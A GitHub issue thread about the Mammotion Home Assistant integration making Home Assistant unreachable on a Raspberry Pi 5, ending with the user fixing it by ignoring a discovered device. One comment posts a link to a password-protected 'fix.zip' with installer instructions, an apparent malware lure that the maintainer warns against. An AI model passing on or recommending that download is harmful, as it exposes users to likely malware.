### ISSUE TITLE
HA isn't reachable

### ISSUE THREAD

**Issue by Sergey842248** [mikey0000/Mammotion-HA#84]
### The problem

After the Update to 0.1.3 and adding my Luba through the Integration instantly the whole Homeassistant becomes unreachable, I updated from 0.0.29. Does anyone have a solution or at least the same problem?

### What Mammotion mower are you using?

Luba 2

### What version of the Mammotion intergration are you using?

0.1.3

### What version of Home Assistant Core are you running?

core-2024.8.3

**Comment by mikey0000** [comment]
What are you running HA on? I've been trying to replicate this and haven't been able to. Are you able to pull logs?

**Comment by Sergey842248** [comment]
> What are you running HA on? I've been trying to replicate this and haven't been able to. Are you able to pull logs? 

Thanks for the fast response, I'm running HA on a Raspberry Pi5 but I have no chance entering the GUI so I don't know how I can pull logs without the GUI. Thanks.

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mikey0000** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

What is this?

**Comment by mikey0000** [comment]
> > Download
> > https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
> > password: changeme
> > In the installer menu, select "gcc."
> 
> Thanks, I'll try this if I'm back from work (like 12-13h) and let you know if it works.

Don't download random passworded zips. At least without trusting the poster.

**Comment by mikey0000** [comment]
Can you try to pull 0.1.4 I suspect it may have something to do with the login bug I fixed.

**Comment by mikey0000** [comment]
I've released further updates that should hopefully mitigate this issue.

**Comment by Sergey842248** [comment]
> I've released further updates that should hopefully mitigate this issue.

I tried but same Issue, after I added the Luba Home Assistant isn't reachable. May this helps, the Browser load unlimited and I have to pull the SD Card, write a new Image on the SD, back insert it and reconfigure HA.

**Comment by mikey0000** [comment]
Sdcards aren't great for HA. I'd switch to a ssd or a USB stick. But without a log I can't resolve this issue.

**Comment by Sergey842248** [comment]
> Sdcards aren't great for HA. I'd switch to a ssd or a USB stick. But without a log I can't resolve this issue. 

I'll try to catch some logs

**Comment by Sergey842248** [comment]
IT WORKS!!! Now it works, I have Ignored the discovered device, which every time I clicked on it says "no_device". May the Logs have more information: 

Before adding the device:
[home-assistant_2024-08-29T04-42-01.001Z.log](https://github.com/user-attachments/files/16792205/home-assistant_2024-08-29T04-42-01.001Z.log)

After adding the device: 
[home-assistant_2024-08-29T04-43-01.778Z.log](https://github.com/user-attachments/files/16792209/home-assistant_2024-08-29T04-43-01.778Z.log)

Now it works well! Thanks so much!
